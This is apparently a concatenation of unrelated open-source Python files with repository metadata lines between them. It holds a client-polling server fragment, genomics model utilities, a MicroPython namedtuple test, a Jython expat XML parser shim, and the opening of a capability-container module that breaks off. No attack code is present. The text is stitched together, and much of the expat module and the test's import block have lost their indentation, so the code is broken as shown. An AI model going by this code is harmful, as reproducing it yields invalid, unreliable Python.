    def __init__(self):
        # Poll every connected client on a fixed 5-second cadence.
        self.clientInfoChecker = task.LoopingCall(self.infoChecker)
        self.clientInfoChecker.start(5)

    def infoChecker(self, session_id='', module_id='', end='[ENDOFMESSAGE]'):
        # Broadcast a lightweight 'infoChecker' ping to every client socket,
        # framed the same way as send_message output.
        for key in self.clients.keys():
            client = self.clients[key]['socket']
            client.transport.write(str({
                'payload': 'infoChecker',
                'mode': 'infoChecker',
                'from': 'server',
                'session_id': session_id,
                'module_id': module_id,
            }) + end)
sss1/DeepInteractions | pairwise/util.py | 2 | 5513 | import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix, log_loss, roc_curve, auc, precision_recall_curve, average_precision_score
def initialize_with_JASPAR(enhancer_conv_layer, promoter_conv_layer):
    """Seed both conv layers' kernels with JASPAR motif matrices.

    Loads motifs from a hard-coded .npy path, appends reverse-complemented
    copies of six motifs, and writes each motif (minus the 0.25 uniform
    background) into a random window of each kernel.  Biases are drawn
    uniformly from [-1, 0).  Python 2 code (print statement, xrange).
    """
    JASPAR_motifs = list(np.load('/home/sss1/Desktop/projects/DeepInteractions/JASPAR_CORE_2016_vertebrates.npy'))
    print 'Initializing ' + str(len(JASPAR_motifs)) + ' kernels with JASPAR motifs.'
    enhancer_conv_weights = enhancer_conv_layer.get_weights()
    promoter_conv_weights = promoter_conv_layer.get_weights()
    # [::-1, ::-1] reverses both axes, i.e. the reverse-complement of a PWM.
    reverse_motifs = [JASPAR_motifs[19][::-1,::-1], JASPAR_motifs[97][::-1,::-1],
                      JASPAR_motifs[98][::-1,::-1], JASPAR_motifs[99][::-1,::-1],
                      JASPAR_motifs[100][::-1,::-1], JASPAR_motifs[101][::-1,::-1]]
    JASPAR_motifs = JASPAR_motifs + reverse_motifs
    for i in xrange(len(JASPAR_motifs)):
        m = JASPAR_motifs[i][::-1,:]
        w = len(m)
        # Random placement within the 30-wide kernel, 3-column margins.
        start = np.random.randint(low=3, high=30-w+1-3)
        enhancer_conv_weights[0][i,:,start:start+w,0] = m.T - 0.25
        enhancer_conv_weights[1][i] = np.random.uniform(low=-1.0,high=0.0)
        promoter_conv_weights[0][i,:,start:start+w,0] = m.T - 0.25
        promoter_conv_weights[1][i] = np.random.uniform(low=-1.0,high=0.0)
    enhancer_conv_layer.set_weights(enhancer_conv_weights)
    promoter_conv_layer.set_weights(promoter_conv_weights)
def split_train_and_val_data(X_enhancer_train, X_promoter_train, y_train, training_frac):
    """Split paired inputs and labels into training and validation parts.

    The first ``training_frac`` of the rows (no shuffling) become the
    training set; the remainder is the validation set.  Returns
    (enh_train, prom_train, y_train, enh_val, prom_val, y_val).
    """
    cutoff = int(training_frac * np.shape(y_train)[0])
    enh_tr, enh_val = X_enhancer_train[:cutoff, :], X_enhancer_train[cutoff:, :]
    prom_tr, prom_val = X_promoter_train[:cutoff, :], X_promoter_train[cutoff:, :]
    labels_tr, labels_val = y_train[:cutoff], y_train[cutoff:]
    return enh_tr, prom_tr, labels_tr, enh_val, prom_val, labels_val
# Calculates and prints several metrics (confusion matrix, Precision/Recall/F1)
# in real time; also updates the values in the conf_mat_callback so they can be
# plotted or analyzed later
def print_live(conf_mat_callback, y_val, val_predict, logs):
    """Print confusion-matrix metrics for one epoch and record history.

    Appends precision/recall/F1/loss/accuracy to the corresponding lists on
    *conf_mat_callback*.  Python 2 code (print statements).
    """
    conf_mat = confusion_matrix(y_val, val_predict).astype(float)
    # Positive class is index 1 of the 2x2 confusion matrix.
    precision = conf_mat[1, 1] / conf_mat[:, 1].sum()
    recall = conf_mat[1, 1] / conf_mat[1, :].sum()
    f1_score = 2 * precision * recall / (precision + recall)
    acc = (conf_mat[0, 0] + conf_mat[1, 1]) / np.sum(conf_mat)
    loss = log_loss(y_val, val_predict)

    # Record history on the callback for later plotting (see plot_live).
    conf_mat_callback.precisions.append(precision)
    conf_mat_callback.recalls.append(recall)
    conf_mat_callback.f1_scores.append(f1_score)
    conf_mat_callback.losses.append(loss)
    conf_mat_callback.accs.append(acc)

    print '\nConfusion matrix:\n' + str(conf_mat) + '\n'
    print 'Precision: ' + str(precision) + \
          ' Recall: ' + str(recall) + \
          ' F1: ' + str(f1_score) + \
          ' Accuracy: ' + str(acc) + \
          ' Log Loss: ' + str(loss)
    print 'Predicted fractions: ' + str(val_predict.mean())
    print 'Actual fractions: ' + str(y_val.mean()) + '\n'
# Plots several metrics (Precision/Recall/F1, loss, Accuracy) in real time
# (i.e., after each epoch)
def plot_live(conf_mat_callback):
    """Redraw per-epoch metric curves stored on *conf_mat_callback*.

    Losses are normalized by their max so everything fits on a [0, 1] axis.
    """
    epoch = conf_mat_callback.epoch
    plt.clf()
    # One x value per completed epoch, starting at 1.
    xs = [1 + i for i in range(epoch)]
    precisions_plot = plt.plot(xs, conf_mat_callback.precisions, label = 'Precision')
    recalls_plot = plt.plot(xs, conf_mat_callback.recalls, label = 'Recall')
    f1_scores_plot = plt.plot(xs, conf_mat_callback.f1_scores, label = 'F1 score')
    accs_plot = plt.plot(xs, conf_mat_callback.accs, label = 'Accuracy')
    losses_plot = plt.plot(xs, conf_mat_callback.losses / max(conf_mat_callback.losses), label = 'Loss')
    # Training curves are per-batch, so spread them evenly across epochs.
    batch_xs = [1 + epoch * float(i)/len(conf_mat_callback.training_losses) for i in range(len(conf_mat_callback.training_losses))]
    training_losses_plot = plt.plot(batch_xs, conf_mat_callback.training_losses / max(conf_mat_callback.training_losses), label = 'Training Loss')
    training_losses_plot = plt.plot(batch_xs, conf_mat_callback.training_accs, label = 'Training Accuracy')
    plt.legend(bbox_to_anchor = (0, 1), loc = 4, borderaxespad = 0., prop={'size':6})
    plt.ylim([0, 1])
    # Non-blocking refresh so training can continue.
    plt.pause(.001)
# Given a (nearly) balanced data set (i.e., labeled enhancer and promoter
# sequence pairs), subsamples rows at random while always retaining the
# positive (y == 1) samples.
def subsample_imbalanced(X_enhancer, X_promoter, y, positive_subsample_frac):
    """Randomly keep a fraction of rows, always retaining positives.

    A row is kept if a uniform draw falls below *positive_subsample_frac*
    OR its label is 1.  Fixes three bugs in the original: it referenced the
    undefined name ``y_train``, called the ``np.random`` module as a
    function (should be ``np.random.rand``), and combined two boolean
    arrays with the scalar ``or`` operator instead of elementwise ``|``.
    NOTE(review): the original comment claimed positives were subsampled
    and negatives retained; the code's own structure says the opposite,
    which is what is preserved here - confirm intended direction.
    """
    n = np.shape(y)[0]  # sample size (i.e., number of pairs)
    to_keep = (np.random.rand(n) < positive_subsample_frac) | (y == 1)
    return X_enhancer[to_keep, :], X_promoter[to_keep, :], y[to_keep]
def compute_AUPR(y, y_score):
    """Return the area under the precision-recall curve (average precision).

    *y* holds binary labels, *y_score* the predicted scores.  The original
    computed ``average_precision_score`` into a local and then fell off the
    end, returning None; it also ran an unused ``precision_recall_curve``
    call.  Returning the value is backward-compatible for callers that
    ignored the (useless) None result.
    """
    return average_precision_score(y, y_score)
def plot_PR_curve(y, y_score):
    """Return average precision (AUPR) of *y_score* against labels *y*.

    Despite the name this function (like the original) only computes the
    summary statistic; it does not draw anything.  The dead
    ``precision_recall_curve`` call, whose results were never used, is
    removed.
    """
    return average_precision_score(y, y_score)
def plot_ROC_curve(y, y_score):
    """Return the area under the ROC curve of *y_score* against labels *y*.

    Despite the name, nothing is plotted; only the AUC is computed.
    """
    false_pos_rate, true_pos_rate, _ = roc_curve(y, y_score)
    return auc(false_pos_rate, true_pos_rate)
| gpl-3.0 |
dinau/micropython | tests/basics/namedtuple1.py | 16 | 1352 | try:
from collections import namedtuple
except ImportError:
from ucollections import namedtuple
# Exercise namedtuple construction, tuple behavior, immutability and error
# cases; the printed output is the test oracle, so nothing here may change it.
T = namedtuple("Tup", ["foo", "bar"])
# CPython prints fully qualified name, what we don't bother to do so far
#print(T)

# Positional and keyword construction must agree with plain-tuple semantics.
for t in T(1, 2), T(bar=1, foo=2):
    print(t)
    print(t[0], t[1])
    print(t.foo, t.bar)
    print(len(t))
    print(bool(t))
    print(t + t)
    print(t * 3)
    print([f for f in t])
    print(isinstance(t, tuple))

# Immutability: item assignment and attribute assignment must both fail.
try:
    t[0] = 200
except TypeError:
    print("TypeError")
try:
    t.bar = 200
except AttributeError:
    print("AttributeError")

# Constructor arity/keyword error cases.
try:
    t = T(1)
except TypeError:
    print("TypeError")
try:
    t = T(1, 2, 3)
except TypeError:
    print("TypeError")
try:
    t = T(foo=1)
except TypeError:
    print("TypeError")
try:
    t = T(1, foo=1)
except TypeError:
    print("TypeError")
# enough args, but kw is wrong
try:
    t = T(1, baz=3)
except TypeError:
    print("TypeError")

# bad argument for member spec
try:
    namedtuple('T', 1)
except TypeError:
    print("TypeError")

# Try single string
T3 = namedtuple("TupComma", "foo bar")
t = T3(1, 2)
print(t.foo, t.bar)

# Try tuple
T4 = namedtuple("TupTuple", ("foo", "bar"))
t = T4(1, 2)
print(t.foo, t.bar)

# Try single string with comma field seperator
# Not implemented so far
#T2 = namedtuple("TupComma", "foo,bar")
#t = T2(1, 2)
| mit |
wreckJ/intellij-community | python/lib/Lib/xml/parsers/expat.py | 73 | 21923 | # coding: utf-8
#------------------------------------------------------------------------------
# Copyright (c) 2008 Sébastien Boisgérault
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# -----------------------------------------------------------------------------
__all__ = ["ExpatError", "ParserCreate", "XMLParserType", "error", "errors"]
# Jython check
import sys
if not sys.platform.startswith('java'):
raise ImportError("this version of expat requires the jython interpreter")
# Standard Python Library
import re
import types
# Jython
from org.python.core import Py
from org.python.core.util import StringUtil
from jarray import array
# Java Standard Edition
from java.io import ByteArrayInputStream
from java.lang import String, StringBuilder
from org.xml.sax import InputSource
from org.xml.sax import SAXNotRecognizedException, SAXParseException
from org.xml.sax.helpers import XMLReaderFactory
from org.xml.sax.ext import DefaultHandler2
# Xerces
try:
# Name mangled by jarjar?
import org.python.apache.xerces.parsers.SAXParser
_xerces_parser = "org.python.apache.xerces.parsers.SAXParser"
except ImportError:
_xerces_parser = "org.apache.xerces.parsers.SAXParser"
# @expat args registry
_register = {}
def ParserCreate(encoding=None, namespace_separator=None):
    """Return a new XMLParser (pyexpat-compatible factory function)."""
    return XMLParser(encoding, namespace_separator)
class XMLParser(object):
    """pyexpat-compatible parser backed by a SAX (Xerces) reader on Jython.

    Buffers all data passed to Parse() and runs the actual SAX parse only
    on the final call; handler callbacks are bridged via XMLEventHandler.
    """

    def __init__(self, encoding, namespace_separator):
        self.encoding = encoding
        # expat-style location attributes, updated by the event handler.
        self.CurrentLineNumber = 1
        self.CurrentColumnNumber = 0
        self._NextLineNumber = 1
        self._NextColumnNumber = 0
        self.ErrorLineNumber = -1
        self.ErrorColumnNumber = -1
        self.ErrorCode = None

        if namespace_separator is None:
            self.namespace_separator = namespace_separator
        elif isinstance(namespace_separator, basestring):
            self.namespace_separator = str(namespace_separator)
            if len(self.namespace_separator) > 1:
                error = ("namespace_separator must be at most one character, "
                         "omitted, or None")
                raise ValueError(error)
        else:
            error = ("ParserCreate() argument 2 must be string or None, "
                     "not %s" % type(namespace_separator).__name__)
            raise TypeError(error)

        self._reader = XMLReaderFactory.createXMLReader(_xerces_parser)

        if self.namespace_separator is None:
            try:
                feature = "http://xml.org/sax/features/namespaces"
                self._reader.setFeature(feature, False)
            except SAXNotRecognizedException:
                error = ("namespace support cannot be disabled; "
                         "set namespace_separator to a string of length 1.")
                raise ValueError(error)

        self._base = None
        self._buffer_text = True
        self._returns_unicode = True

        # Accumulates raw input across Parse() calls until isfinal.
        self._data = StringBuilder()

        # One handler object serves all SAX handler roles.
        self._handler = XMLEventHandler(self)
        self._reader.setContentHandler(self._handler)
        self._reader.setErrorHandler(self._handler)
        self._reader.setDTDHandler(self._handler)
        self._reader.setEntityResolver(self._handler)

        sax_properties = ("lexical-handler", "declaration-handler")
        for name in sax_properties:
            try:
                name = "http://xml.org/sax/properties/" + name
                self._reader.setProperty(name, self._handler)
            except SAXNotRecognizedException:
                error = "can't set property %r" % name
                raise NotImplementedError(error)

        apache_features = (("nonvalidating/load-external-dtd", False),)
        for name, value in apache_features:
            try:
                name = "http://apache.org/xml/features/" + name
                self._reader.setFeature(name, value)
            except SAXNotRecognizedException:
                error = "can't set feature %r" % name
                raise NotImplementedError(error)

        # experimental
        #f = "http://xml.org/sax/features/external-general-entities"
        f = "http://xml.org/sax/features/external-parameter-entities"
        #self._reader.setFeature(f, False)

        # check
        f = "http://xml.org/sax/features/use-entity-resolver2"
        assert self._reader.getFeature(f)

    def GetBase(self):
        return self._base

    def SetBase(self, base):
        self._base = base

    def _error(self, value=None):
        # Getter/setter for attributes this shim deliberately doesn't support.
        raise AttributeError("'XMLParser' has no such attribute")

    def _get_buffer_text(self):
        return self._buffer_text

    def _set_buffer_text(self, value):
        self._buffer_text = bool(value)

    def _get_returns_unicode(self):
        return bool(self._returns_unicode)

    def _set_returns_unicode(self, value):
        self._returns_unicode = value

    # 'ordered' and 'specified' attributes are not supported
    ordered_attributes = property(_error, _error)
    specified_attributes = property(_error, _error)

    # any setting is allowed, but it won't make a difference
    buffer_text = property(_get_buffer_text, _set_buffer_text)

    # non-significant read-only values
    buffer_used = property(lambda self: None)
    buffer_size = property(lambda self: None)

    # 'returns_unicode' attribute is properly supported
    returns_unicode = property(_get_returns_unicode, _set_returns_unicode)

    def _expat_error(self, sax_error):
        """Translate a SAXParseException into an ExpatError."""
        sax_message = sax_error.getMessage()
        pattern = 'The entity ".*" was referenced, but not declared\.'
        if re.match(pattern, sax_message):
            expat_message = "undefined entity: line %s, column %s" % \
                            (self.ErrorLineNumber, self.ErrorColumnNumber)
        else:
            expat_message = sax_message
        error = ExpatError(expat_message)
        error.lineno = self.ErrorLineNumber
        error.offset = self.ErrorColumnNumber
        error.code = self.ErrorCode
        return error

    def Parse(self, data, isfinal=False):
        """Buffer *data*; on the final call, run the SAX parse. Returns 1."""
        # The 'data' argument should be an encoded text: a str instance that
        # represents an array of bytes. If instead it is a unicode string,
        # only the us-ascii range is considered safe enough to be silently
        # converted.
        if isinstance(data, unicode):
            data = data.encode(sys.getdefaultencoding())
        self._data.append(data)
        if isfinal:
            bytes = StringUtil.toBytes(self._data.toString())
            byte_stream = ByteArrayInputStream(bytes)
            source = InputSource(byte_stream)
            if self.encoding is not None:
                source.setEncoding(self.encoding)
            try:
                self._reader.parse(source)
            except SAXParseException, sax_error:
                # Experiments tend to show that the '_Next*' parser locations
                # match more closely expat behavior than the 'Current*' or sax
                # error locations.
                self.ErrorLineNumber = self._NextLineNumber
                self.ErrorColumnNumber = self._NextColumnNumber
                self.ErrorCode = None
                raise self._expat_error(sax_error)
            return 1

    def ParseFile(self, file):
        """Parse an entire file object in one shot."""
        # TODO: pseudo-buffering if a read without argument is not supported.
        # document parse / parsefile usage.
        return self.Parse(file.read(), isfinal=True)

# Alias matching the pyexpat module's public name for the parser type.
XMLParserType = XMLParser
def _encode(arg, encoding):
    """Recursively encode unicode strings inside nested containers.

    Unicode values are encoded with *encoding*; tuples/lists/dicts are
    rebuilt with their elements encoded.  Fix: already-encoded byte strings
    now pass through untouched - previously a plain str fell into the
    container branch, where ``type(arg)(<generator>)`` turned it into the
    repr of a generator object.
    """
    if isinstance(arg, unicode):
        return arg.encode(encoding)
    elif isinstance(arg, str):
        return arg
    else:
        if isinstance(arg, dict):
            iterator = arg.iteritems()
        else:
            iterator = iter(arg)
        return type(arg)(_encode(_arg, encoding) for _arg in iterator)
def expat(callback=None, guard=True, force=False, returns=None):
    """Decorator bridging a SAX handler method to an expat-style callback.

    *callback* names the attribute looked up on the parser (e.g.
    'StartElementHandler'); *guard* is True/False or the name of a boolean
    attribute on the handler; *force* runs the method even without a
    callback; *returns* is the value returned to the SAX caller.  Multiple
    decorated methods with the same name are accumulated in _register
    (keyed by name and defining frame) and all run on each event.
    """
    def _expat(method):
        name = method.__name__
        # Key on the enclosing frame so same-named methods from different
        # class bodies don't collide in the shared registry.
        context = id(sys._getframe(1))
        key = name, context
        append = _register.setdefault(key, []).append
        append((method, callback, guard, force, returns))
        def new_method(*args):
            self = args[0]
            parser = self.parser
            self._update_location(event=name) # bug if multiple method def
            for (method, callback, guard, force, returns) in _register[key]:
                if guard not in (True, False):
                    # Resolve a named guard attribute on the handler.
                    guard = getattr(self, guard)
                _callback = callback and guard and \
                            getattr(parser, callback, None)
                if _callback or force:
                    results = method(*args)
                    if _callback:
                        if not isinstance(results, tuple):
                            results = (results,)
                        if not parser.returns_unicode:
                            results = _encode(results, "utf-8")
                        _callback(*results)
            return returns
        new_method.__name__ = name
        #new_method.__doc__ = method.__doc__ # what to do with multiple docs ?
        return new_method
    return _expat
class XMLEventHandler(DefaultHandler2):
def __init__(self, parser):
self.parser = parser
self._tags = {}
self.not_in_dtd = True
self._entity = {}
self._previous_event = None
# --- Helpers -------------------------------------------------------------
def _intern(self, tag):
return self._tags.setdefault(tag, tag)
def _qualify(self, local_name, qname, namespace=None):
namespace_separator = self.parser.namespace_separator
if namespace_separator is None:
return qname
if not namespace:
return local_name
else:
return namespace + namespace_separator + local_name
def _char_slice_to_unicode(self, characters, start, length):
"""Convert a char[] slice to a PyUnicode instance"""
text = Py.newUnicode(String(characters[start:start + length]))
return text
def _expat_content_model(self, name, model_):
# TODO : implement a model parser
return (name, model_) # does not fit expat conventions
def _update_location(self, event=None):
parser = self.parser
locator = self._locator
# ugly hack that takes care of a xerces-specific (?) locator issue:
# locate start and end elements at the '<' instead of the first tag
# type character.
if event == "startElement" and self._previous_event == "characters":
parser._NextColumnNumber = max(parser._NextColumnNumber - 1, 0)
if event == "endElement" and self._previous_event == "characters":
parser._NextColumnNumber = max(parser._NextColumnNumber - 2, 0)
# TODO: use the same trick to report accurate error locations ?
parser.CurrentLineNumber = parser._NextLineNumber
parser.CurrentColumnNumber = parser._NextColumnNumber
parser._NextLineNumber = locator.getLineNumber()
parser._NextColumnNumber = locator.getColumnNumber() - 1
self._previous_event = event
# --- ContentHandler Interface --------------------------------------------
@expat("ProcessingInstructionHandler")
def processingInstruction(self, target, data):
return target, data
@expat("StartElementHandler")
def startElement(self, namespace, local_name, qname, attributes):
tag = self._qualify(local_name, qname, namespace)
attribs = {}
length = attributes.getLength()
for index in range(length):
local_name = attributes.getLocalName(index)
qname = attributes.getQName(index)
namespace = attributes.getURI(index)
name = self._qualify(local_name, qname, namespace)
value = attributes.getValue(index)
attribs[name] = value
return self._intern(tag), attribs
@expat("EndElementHandler")
def endElement(self, namespace, local_name, qname):
return self._intern(self._qualify(local_name, qname, namespace))
@expat("CharacterDataHandler")
def characters(self, characters, start, length):
return self._char_slice_to_unicode(characters, start, length)
@expat("DefaultHandlerExpand")
def characters(self, characters, start, length):
return self._char_slice_to_unicode(characters, start, length)
@expat("DefaultHandler")
def characters(self, characters, start, length):
# TODO: make a helper function here
if self._entity["location"] == (self.parser.CurrentLineNumber,
self.parser.CurrentColumnNumber):
return "&%s;" % self._entity["name"]
else:
return self._char_slice_to_unicode(characters, start, length)
@expat("StartNamespaceDeclHandler")
def startPrefixMapping(self, prefix, uri):
return prefix, uri
@expat("EndNamespaceDeclHandler")
def endPrefixMapping(self, prefix):
return prefix
empty_source = InputSource(ByteArrayInputStream(array([], "b")))
@expat("ExternalEntityRefHandler", guard="not_in_dtd",
returns=empty_source)
def resolveEntity(self, name, publicId, baseURI, systemId):
context = name # wrong. see expat headers documentation.
base = self.parser.GetBase()
return context, base, systemId, publicId
@expat("DefaultHandlerExpand", guard="not_in_dtd",
returns=empty_source)
def resolveEntity(self, name, publicId, baseURI, systemId):
return "&%s;" % name
@expat("DefaultHandler", guard="not_in_dtd",
returns=empty_source)
def resolveEntity(self, name, publicId, baseURI, systemId):
return "&%s;" % name
@expat(force=True, returns=empty_source)
def resolveEntity(self, name, publicId, baseURI, systemId):
pass
def setDocumentLocator(self, locator):
self._locator = locator
def skippedEntity(self, name):
error = ExpatError()
error.lineno = self.ErrorLineNumber = self.parser._NextLineNumber
error.offset = self.ErrorColumnNumber = self.parser._NextColumnNumber
error.code = self.ErrorCode = None
message = "undefined entity &%s;: line %s, column %s"
message = message % (name, error.lineno, error.offset)
error.__init__(message)
raise error
# --- LexicalHandler Interface --------------------------------------------
@expat("CommentHandler")
def comment(self, characters, start, length):
return self._char_slice_to_unicode(characters, start, length)
@expat("StartCdataSectionHandler")
def startCDATA(self):
return ()
@expat("EndCdataSectionHandler")
def endCDATA(self):
return ()
@expat("StartDoctypeDeclHandler", force=True)
def startDTD(self, name, publicId, systemId):
    # Flag used by the guard="not_in_dtd" registrations above.
    self.not_in_dtd = False
    has_internal_subset = 0 # don't know this ...
    return name, systemId, publicId, has_internal_subset

@expat("EndDoctypeDeclHandler", force=True)
def endDTD(self):
    self.not_in_dtd = True
def startEntity(self, name):
    """Record the name and parser position of the entity about to be
    expanded; characters() uses this to re-emit the raw reference."""
    self._entity = {}
    self._entity["location"] = (self.parser._NextLineNumber,
                                self.parser._NextColumnNumber)
    self._entity["name"] = name

def endEntity(self, name):
    # Nothing to clean up; the recorded location is simply left stale.
    pass
# --- DTDHandler Interface ------------------------------------------------
@expat("NotationDeclHandler")
def notationDecl(self, name, publicId, systemId):
    # Expat's callback signature is (name, base, systemId, publicId);
    # reorder the SAX arguments accordingly.
    base = self.parser.GetBase()
    return name, base, systemId, publicId

@expat("UnparsedEntityDeclHandler") # deprecated
def unparsedEntityDecl(self, name, publicId, systemId, notationName):
    base = self.parser.GetBase()
    return name, base, systemId, publicId, notationName
# --- DeclHandler Interface -----------------------------------------------
@expat("AttlistDeclHandler")
def attributeDecl(self, eName, aName, type, mode, value):
    # TODO: adapt mode, required, etc.
    required = False
    return eName, aName, type, value, required

@expat("ElementDeclHandler")
def elementDecl(self, name, model):
    # Translate the Java content model into expat's model tuple form.
    return self._expat_content_model(name, model)

@expat("EntityDeclHandler")
def externalEntityDecl(self, name, publicId, systemId):
    """Map an external entity declaration onto expat's 7-tuple callback
    arguments; value is None for external entities."""
    base = self.parser.GetBase()
    value = None
    is_parameter_entity = None
    notation_name = None
    return (name, is_parameter_entity, value, base, systemId, publicId,
            notation_name)

@expat("EntityDeclHandler")
def internalEntityDecl(self, name, value):
    """Same callback as externalEntityDecl, but with a literal value and
    no system/public identifiers."""
    base = self.parser.GetBase()
    is_parameter_entity = None
    notation_name = None
    systemId, publicId = None, None
    return (name, is_parameter_entity, value, base, systemId, publicId,
            notation_name)
def _init_model():
    """Create the ``pyexpat.model`` substitute module.

    Defines the XML_CQUANT_* quantifier constants (0-based) and the
    XML_CTYPE_* content-type constants (1-based), matching pyexpat.
    """
    global model
    model = types.ModuleType("pyexpat.model")
    model.__doc__ = "Constants used to interpret content model information."
    for value, suffix in enumerate("NONE OPT REP PLUS".split()):
        setattr(model, "XML_CQUANT_" + suffix, value)
    for value, suffix in enumerate("EMPTY ANY MIXED NAME CHOICE SEQ".split()):
        setattr(model, "XML_CTYPE_" + suffix, value + 1)

_init_model()
del _init_model
class ExpatError(Exception):
    """Raised for XML parsing errors; mirrors ``pyexpat.ExpatError``."""
    pass

# pyexpat also exposes the exception class under the legacy name ``error``.
error = ExpatError
def _init_error_strings():
    """Install the module-level ErrorString() lookup.

    Mirrors ``pyexpat.ErrorString``: maps a numeric expat error code to
    its human-readable description, or None for unknown codes.
    """
    global ErrorString
    # Descriptions indexed by error code; index 0 is unused.
    error_strings = (
        None,
        "out of memory",
        "syntax error",
        "no element found",
        "not well-formed (invalid token)",
        "unclosed token",
        "partial character",
        "mismatched tag",
        "duplicate attribute",
        "junk after document element",
        "illegal parameter entity reference",
        "undefined entity",
        "recursive entity reference",
        "asynchronous entity",
        "reference to invalid character number",
        "reference to binary entity",
        "reference to external entity in attribute",
        "XML or text declaration not at start of entity",
        "unknown encoding",
        "encoding specified in XML declaration is incorrect",
        "unclosed CDATA section",
        "error in processing external entity reference",
        "document is not standalone",
        "unexpected parser state - please send a bug report",
        "entity declared in parameter entity",
        "requested feature requires XML_DTD support in Expat",
        "cannot change setting once parsing has begun",
        "unbound prefix",
        "must not undeclare prefix",
        "incomplete markup in parameter entity",
        "XML declaration not well-formed",
        "text declaration not well-formed",
        "illegal character(s) in public id",
        "parser suspended",
        "parser not suspended",
        "parsing aborted",
        "parsing finished",
        "cannot suspend in external parameter entity")

    def ErrorString(code):
        """Return the description for *code*, or None if out of range."""
        try:
            message = error_strings[code]
        except IndexError:
            return None
        return message

_init_error_strings()
del _init_error_strings
def _init_errors():
    """Create the ``pyexpat.errors`` substitute module.

    As in CPython's pyexpat.errors, each XML_ERROR_* attribute is bound to
    its human-readable message string (not its numeric code).
    """
    global errors
    errors = types.ModuleType("pyexpat.errors")
    errors.__doc__ = "Constants used to describe error conditions."
    # NOTE: XML_ERROR_NONE appears twice with no comma between the copies.
    # After split(',') both copies land in element 0, which the [1:] slice
    # below discards -- this keeps every remaining name aligned with its
    # 1-based error code.  XML_ERROR_NONE itself is never set on the
    # module, apparently intentionally (CPython's pyexpat.errors has no
    # such attribute either).
    error_names = """
    XML_ERROR_NONE
    XML_ERROR_NONE,
    XML_ERROR_NO_MEMORY,
    XML_ERROR_SYNTAX,
    XML_ERROR_NO_ELEMENTS,
    XML_ERROR_INVALID_TOKEN,
    XML_ERROR_UNCLOSED_TOKEN,
    XML_ERROR_PARTIAL_CHAR,
    XML_ERROR_TAG_MISMATCH,
    XML_ERROR_DUPLICATE_ATTRIBUTE,
    XML_ERROR_JUNK_AFTER_DOC_ELEMENT,
    XML_ERROR_PARAM_ENTITY_REF,
    XML_ERROR_UNDEFINED_ENTITY,
    XML_ERROR_RECURSIVE_ENTITY_REF,
    XML_ERROR_ASYNC_ENTITY,
    XML_ERROR_BAD_CHAR_REF,
    XML_ERROR_BINARY_ENTITY_REF,
    XML_ERROR_ATTRIBUTE_EXTERNAL_ENTITY_REF,
    XML_ERROR_MISPLACED_XML_PI,
    XML_ERROR_UNKNOWN_ENCODING,
    XML_ERROR_INCORRECT_ENCODING,
    XML_ERROR_UNCLOSED_CDATA_SECTION,
    XML_ERROR_EXTERNAL_ENTITY_HANDLING,
    XML_ERROR_NOT_STANDALONE,
    XML_ERROR_UNEXPECTED_STATE,
    XML_ERROR_ENTITY_DECLARED_IN_PE,
    XML_ERROR_FEATURE_REQUIRES_XML_DTD,
    XML_ERROR_CANT_CHANGE_FEATURE_ONCE_PARSING,
    XML_ERROR_UNBOUND_PREFIX,
    XML_ERROR_UNDECLARING_PREFIX,
    XML_ERROR_INCOMPLETE_PE,
    XML_ERROR_XML_DECL,
    XML_ERROR_TEXT_DECL,
    XML_ERROR_PUBLICID,
    XML_ERROR_SUSPENDED,
    XML_ERROR_NOT_SUSPENDED,
    XML_ERROR_ABORTED,
    XML_ERROR_FINISHED,
    XML_ERROR_SUSPEND_PE
    """
    error_names = [name.strip() for name in error_names.split(',')]
    # i is 0-based over the sliced list, so the message comes from code i+1.
    for i, name in enumerate(error_names[1:]):
        setattr(errors, name, ErrorString(i+1))

_init_errors()
del _init_errors
| apache-2.0 |
crchemist/scioncc | src/pyon/container/cc.py | 2 | 18237 | #!/usr/bin/env python
"""Capability Container"""
__author__ = 'Adam R. Smith, Michael Meisinger, Dave Foster <dfoster@asascience.com>'
from pyon.container import ContainerCapability
from pyon.core import bootstrap
from pyon.core.bootstrap import CFG
from pyon.core.exception import ContainerError, BadRequest
from pyon.datastore.datastore import DataStore
from pyon.ion.event import EventPublisher
from pyon.ion.endpoint import ProcessRPCServer
from pyon.net.transport import LocalRouter
from pyon.util.config import Config
from pyon.util.containers import get_default_container_id, DotDict, named_any, dict_merge
from pyon.util.log import log
from pyon.util.context import LocalContextMixin
from pyon.util.greenlet_plugin import GreenletLeak
from pyon.util.file_sys import FileSystem
from interface.objects import ContainerStateEnum
from interface.services.icontainer_agent import BaseContainerAgent
import atexit
import msgpack
import os
import signal
import traceback
import sys
import gevent
from contextlib import contextmanager
# Capability constants for use in:
# if self.container.has_capability(CCAP.RESOURCE_REGISTRY):
# Filled in by Container._load_capabilities() with capability-name constants.
CCAP = DotDict()

# Container lifecycle states (see Container._status).
INIT = "INIT"
RUNNING = "RUNNING"
TERMINATING = "TERMINATING"
TERMINATED = "TERMINATED"
class Container(BaseContainerAgent):
    """
    The Capability Container. Its purpose is to spawn/monitor processes and services
    that do the bulk of the work in the ION system. It also manages connections to the Exchange
    and the various forms of datastores in the systems.
    """

    # Singleton static variables
    #node = None
    id = None
    name = None
    pidfile = None
    instance = None

    def __init__(self, *args, **kwargs):
        """Initialize (but do not start) the container and every capability
        listed in the profile's start_order. Raises ContainerError on an
        undefined, duplicate or unmet-dependency capability."""
        BaseContainerAgent.__init__(self, *args, **kwargs)

        # Coordinates the container start
        self._status = INIT
        self._is_started = False

        # set container id and cc_agent name (as they are set in base class call)
        self.id = get_default_container_id()
